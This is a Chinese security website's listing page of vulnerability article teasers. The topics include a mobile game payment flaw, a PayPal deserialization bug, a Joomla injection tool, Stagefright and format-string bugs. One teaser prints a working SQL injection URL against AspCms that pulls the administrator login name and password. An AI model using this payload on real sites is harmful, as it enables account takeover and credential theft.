51工具盒子
IOS某手游接口存在设计漏洞2分钱即可充值200元(成功支付入账证明)
<br /> : 前奏,发现appstore搜索排行榜有个街机游戏机\~然后就[下载](https://51tbox.com/)下来玩玩, 第一次登录,送了2k金币。。好少,啥都不玩的。里面有个抓娃娃。。。玩玩看,头几次抓到了,后面打死也抓不到,尼玛,怒了。 <br /> 话说这个问题到底算是支付宝的还是游戏的?...
日常运维
PayPal 远程代码执行漏洞
原文:[http://artsploit.blogspot.com/2016/01/paypal-rce.html](https://51tbox.com/) 在去年12月国外安全研究员发现了一个manager.paypal.com的java序列化漏洞并报告给了paypal进行修复. 这个漏洞异于之前大家发的weblogic jboss websphere等序列化漏洞,...
CVE-2015-7857 Joomla注入漏洞利用工具
文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用! Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理...
aspcms各版本漏洞0day集合
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1 ----------...
GourdScan分布式被动注入漏洞扫描工具
**GourdScan** 之前俩个轮子中的一个的升级版,谈不上神器。 谈谈升级了哪些: 1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。 2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。 3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进行返...
业务安全漏洞挖掘归纳总结
0x00 索引说明 ========= *** ** * ** *** 6.30在OWASP的分享,关于业务安全的漏洞检测模型。进一步的延伸科普。  [密码找回功能可能存在的问题(补充)](http://drops.wooyun.org/web/3295) 距离上两篇文档过去近半年了,最近整理密码找回的脑图,翻开收集的案例...
再探Stagefright漏洞——POC与EXP
作者:Qever 0x00 前言 ======= *** ** * ** *** 在之前的《抛砖引玉------Stagefright漏洞初探》中,我们确定了漏洞的产生位置,然后整篇文章就戛然而止了。此漏洞毕竟影响很深,有些细节不知当讲不当讲。本篇文章来简单扒一扒漏洞利用的方案。只论思路,具体的Exp还是等漏洞具体细节公布后再做讨论。 0x01 手把手教你构造POC =...
格式化字符串漏洞简介
0x00简介 ====== *** ** * ** *** 格式化字符串,也是一种比较常见的漏洞类型。会触发该漏洞的函数很有限。主要就是printf还有sprintf,fprintf等等c库中print家族的函数。 我们先来看看printf的函数声明 \[sourcecode language="plain"\] \>int prin...
漏洞挂马网站趋势分析
讯电脑管家浏览器漏洞防御模块上报的数据显示,自7月起,拦截到的挂马网页地址数量发生了急剧增长。通过进一步分析发现,这批木马不仅可以在用户电脑中安装大量的推广软件,甚至还有可能进行盗号等恶意行为,给用户的电脑和帐号带来风险。 使用浏览器漏洞挂马是目前互联网上最常用的攻击手段。它利用了IE等浏览器在开发过程中遗留的一些缺陷,可以在用户不知情的情况下运行攻击者指定的恶意程序。由于去...
